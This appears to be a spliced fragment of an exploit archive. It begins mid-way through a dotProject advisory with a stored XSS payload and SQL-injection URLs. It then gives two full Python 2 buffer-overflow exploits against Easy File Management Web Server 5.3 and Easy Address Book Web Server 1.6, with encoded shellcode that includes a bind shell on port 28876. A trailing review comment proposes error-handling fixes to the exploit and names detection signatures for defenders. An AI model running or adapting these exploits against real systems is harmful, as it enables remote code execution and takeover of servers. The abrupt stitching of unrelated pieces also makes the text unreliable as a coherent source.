2. Click the &#039;Forums&#039; link in the top navigation bar or navigate to
index.php?m=forums
3. Click on the name of a forum
4. Click on the &#039;start a new topic&#039; button in the upper right
5. Fill in "<script>alert(\&#039;xss\&#039;);</script>" for the &#039;Subject&#039; and
&#039;Message&#039; fields
4. Click on the &#039;submit&#039; button in the lower right
5. Observe the XSS at the Forums topics screen or
index.php?m=forums&a=viewer&forum_id=2&message_id=X where &#039;X&#039; is the id
of the topic
Impact
Any user with the permissions to create new tickets can expose other
users of dotProject to XSS attacks.
SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
SQL injection vulnerabilities could allow an attacker to expose
sensitive data, such as password hashes, alter the database contents to
introduce stored XSS vulnerabilities, reset administrative user
passwords to allow escalation of privilege and other attacks that could
lead to the compromise of data, user account credentials, or even the
web server.
The following URL&#039;s expose PHP functions that are vulnerable to SQL
injection:
index.php?m=departments&a=addedit&company_id=1&#039;
index.php?m=ticketsmith&a=view&ticket=1&#039;
index.php?m=files&a=index&tab=4&folder=1&#039;
Additionally some forms allow for SQL injection:
* The ticket creation form index.php?m=ticketsmith&a=post_ticket does
not properly sanitize single quotes in the Name or Email fields


@ -0,0 +1,90 @@
#!/usr/bin/env python
# Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow
# Date: 19 May 2014
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.web-file-management.com/download.php
# Version: 5.3
# Tested on: English version of Windows XP Professional SP2 and SP3
#
# Description:
# By setting UserID in the cookie to a long string, we can overwrite EDX which
# allows us to control execution flow when the following instruction is
# executed:
#
# 0x00468702: call dword ptr [edx+28h]
#
# Very similar to Easy File Sharing Web Server 6.8 exploit here:
# http://www.exploit-db.com/exploits/33352/
# I suspect their other web server solutions might be vulnerable to a similar
# overflow.
#
# Tested with Easy File Management Web Server installed in the default location
# at C:\EFS Software\Easy File Management Web Server
import socket
import struct
import sys
target = "172.16.229.134"
port = 80
# calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
# msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
# [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
shellcode = (
"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
"\x1c\x39\xbd"
)
for i in xrange(1,255):
n = ""
if i < 16:
n = "0" + hex(i)[-1]
else:
n = hex(i)[2:]
# craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]
# only second byte changes in the stack address changes, so we can brute
# force it
guess = "0x01" + n + "9898"
print "trying", guess
payload = "A"*20 # padding
payload += struct.pack("<I", 0x1001646a) # call edi @LoadImage.dll
payload += "B"*56 # padding
payload += struct.pack("<I", int(guess, 16)) # guessed address in stack
# containing pointer to
# call edi
payload += "\x90"*20 # nop sled
payload += shellcode # win!
# craft the request
buf = (
"GET /vfolder.ghp HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host:" + target + ":" + str(port) + "\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://" + target + "/\r\n"
"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
"Conection: Keep-Alive\r\n\r\n"
)
# send the request and payload to the server
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((target, port))
s1.send(buf)
s1.close()

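--- a/platforms/windows/remote/33454.py
+++ b/platforms/windows/remote/33454.py
@@ -0,0 +1,117 @@
+#!/usr/bin/env python
+# Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow
+# Date: 19 May 2014
+# Exploit Author: superkojiman - http://www.techorganic.com
+# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
+# Software Link: http://www.efssoft.com/eabws.exe
+# Version: 1.6
+# Tested on: English version of Windows XP Professional SP2 and SP3
+#
+# Description:
+# By setting UserID in the cookie to a long string, we can overwrite EDX which
+# allows us to control execution flow when "call dword ptr [edx+28h]" is
+# executed. EDX is overwritten with an address pointing to a location on the
+# stack which in turn points to a NOP sled leading to the shellcode. This
+# address on the stack is brute forced, but doesn't take long since only the
+# 2nd byte is always different, so the address is always 0x01??B494.
+#
+# It's similar to Easy File Sharing Web Server 6.8 exploit here.
+# http://www.exploit-db.com/exploits/33352/ I suspect same code reused for
+# their Web Server series of applications.
+#
+# Tested with Easy Address Book Web Server installed in the default location
+# at C:\EFS Software\Easy Address Book Web Server
+#
+# The exploit can sometimes fail the first time, so try a few more times and
+# you might get a shell.
+import socket
+import struct
+import sys
+target = "172.16.229.134"
+port = 80
+# Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
+# Binds a shell on port 28876
+# msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin
+# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
+shellcode = (
+"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9" +
+"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef" +
+"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0" +
+"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c" +
+"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5" +
+"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c" +
+"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0" +
+"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74" +
+"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6" +
+"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6" +
+"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a" +
+"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a" +
+"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb" +
+"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1" +
+"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04" +
+"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc" +
+"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7" +
+"\x3e\x57\xf9"
+)
+for i in xrange(1,255):
+n = ""
+if i < 16:
+n = "0" + hex(i)[-1]
+else:
+n = hex(i)[2:]
+guess = "0x01" + n + "b494" # value of edx used in
+# "call dword ptr ds:[edx+28]
+# only 2nd byte changes in stack address
+nops = int(guess, 16) + 129 # addres sof nop sled is guess+129 bytes
+print "[+] Trying guess at", guess
+payload = struct.pack("<I", nops) # pointer to nop sled
+payload += "A"*76 # padding
+payload += struct.pack("<I", int(guess,16)) # address containing pointer to
+# nop sled
+payload += "\x90"*20 # nop sled
+payload += shellcode # win!
+# craft the request
+buf = (
+"GET /addrbook.ghp HTTP/1.1\r\n"
+"User-Agent: Mozilla/4.0\r\n"
+"Host:" + target + ":" + str(port) + "\r\n"
+"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+"Accept-Language: en-us\r\n"
+"Accept-Encoding: gzip, deflate\r\n"
+"Referer: http://" + target + "/\r\n"
+"Cookie: SESSIONID=6771; UserID=" + payload + "; PassWD=;\r\n"
+"Conection: Keep-Alive\r\n\r\n"
+)
+try:
+# send the request and payload to the server
+s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s1.connect((target, port))
+s1.send(buf)
+s1.close()
+except Exception,e:
+pass
+try:
+# check if we guessed the correct address by connecting to port 28876
+s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s2.connect((target, 28876))
+s2.close()
+print "\n[+] Success! A shell is waiting on port 28876!"
+sys.exit(0)
+except Exception,e:
+pass
+print "\n[!] Didn't work. Sometimes it takes a few tries, so try again."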
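Review bot: The two `except Exception,e: pass` blocks inside the loop body (around the `s1` send and the `s2` probe of port 28876) swallow every failure, so a refused or timed-out connection to port 80 is indistinguishable from a guess that did not land, and the closing `[!] Didn't work` message is printed even when the host never accepted a single request; `e` is bound in both handlers but never read. Narrowing each to `except socket.error as e:` and printing the error (e.g. `print "[!] connection failed:", e`) keeps the loop's behaviour while making the actual failure mode visible in the output. The file is Python 2 only (`print` statements, `xrange`, comma-form `except`, `str` concatenation with `struct.pack` output), so the shebang should be `#!/usr/bin/env python2` rather than the unpinned `python`, which on current systems resolves to Python 3 and fails at the first `print`. For defenders, the signature this file documents is a `GET /addrbook.ghp` carrying an oversized, mostly non-printable `UserID` cookie, followed by an inbound connection to TCP 28876 on the affected host; those are the two observables a WAF rule or network monitor would key on.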